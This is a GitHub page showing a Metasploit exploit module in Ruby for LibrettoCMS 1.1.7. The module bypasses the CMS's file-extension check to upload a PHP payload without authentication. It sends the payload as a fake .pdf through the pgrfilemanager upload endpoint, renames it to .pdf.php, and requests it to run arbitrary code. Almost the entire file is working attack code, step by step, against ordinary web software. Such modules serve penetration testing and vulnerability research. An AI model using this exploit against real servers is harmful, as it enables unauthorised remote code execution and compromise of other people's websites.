FilesExpand file tree

 master

/

26421.rb

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

152 lines (123 loc) · 4.6 KB

 master

/

26421.rb

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

152 lines (123 loc) · 4.6 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::PhpEXE

def initialize(info={})

super(update_info(info,

'Name' => "LibrettoCMS File Manager Arbitary File Upload Vulnerability",

'Description' => %q{

This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and

possibly prior. Attackers bypass the file extension check and abuse the upload

feature in order to upload a malicious PHP file without authentication, which

results in arbitary remote code execution.

},

'License' => MSF_LICENSE,

'Author' =>

[

'CWH',

'sinn3r' #Metasploit

],

'References' =>

[

['OSVDB', '94391'],

['EDB', '26213']

],

'Payload' =>

{

'BadChars' => "\x00"

},

'Platform' => ['linux', 'php'],

'Targets' =>

[

[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],

[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]

],

'Privileged' => false,

'DisclosureDate' => "Jun 14 2013",

'DefaultTarget' => 0))

register_options(

[

OptString.new('TARGETURI', [true, 'The base path to LibrettoCMS', '/librettoCMS_v.2.2.2/'])

], self.class)

end

def peer

"#{rhost}:#{rport}"

end

def check

res = send_request_raw({'uri' => normalize_uri(target_uri.path)})

if not res

print_error("#{peer} - Connection timed out")

return Exploit::CheckCode::Unknown

end

if res.body =~ /Powered by <a href=".+">Libretto CMS/

return Exploit::CheckCode::Detected

end

Exploit::CheckCode::Safe

end

def upload(base)

p = get_write_exec_payload(:unlink_self=>true)

fname = "#{Rex::Text.rand_text_alpha(6)}.pdf"

data = Rex::MIME::Message.new

data.add_part(fname, nil, nil, "form-data; name=\"Filename\"")

data.add_part(p, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{fname}\"")

data.add_part('Submit Query', nil, nil, 'form-data; name="Upload"')

post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'upload.php')

res = send_request_cgi({

'method' => 'POST',

'uri' => uri,

'ctype' => "multipart/form-data; boundary=#{data.bound}",

'data' => post_data,

'vars_get' => {'type'=>'all files'}

})

if not res

fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while uploading")

elsif res.code.to_i != 200

fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Unknown reply: #{res.code.to_s}")

end

fname

end

def rename(base, original_fname)

new_name = "#{Rex::Text.rand_text_alpha(5)}.pdf.php"

uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'files.php')

res = send_request_cgi({

'method' => 'POST',

'uri' => uri,

'vars_get' => { 'type' => 'all files' },

'vars_post' => {

'fun' => 'renameFile',

'dir' => '',

'filename' => original_fname,

'newFilename' => new_name

}

})

if not res

fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while renaming")

elsif res.body !~ /"res":"OK"/

fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to rename file")

end

new_name

end

def exec(base, payload_fname)

res = send_request_cgi({ 'uri' => normalize_uri(base, 'userfiles', payload_fname) })

if res and res.code.to_i == 404

fail_with(Exploit::Failure::NotFound, "#{peer} - Not found: #{payload_fname}")

end

end

def exploit

base = target_uri.path

print_status("#{peer} - Uploading malicious file...")

orig_fname = upload(base)

print_status("#{peer} - Renaming #{orig_fname}...")

new_fname = rename(base, orig_fname)

print_status("#{peer} - Executing #{new_fname}...")

exec(base, new_fname)

end

end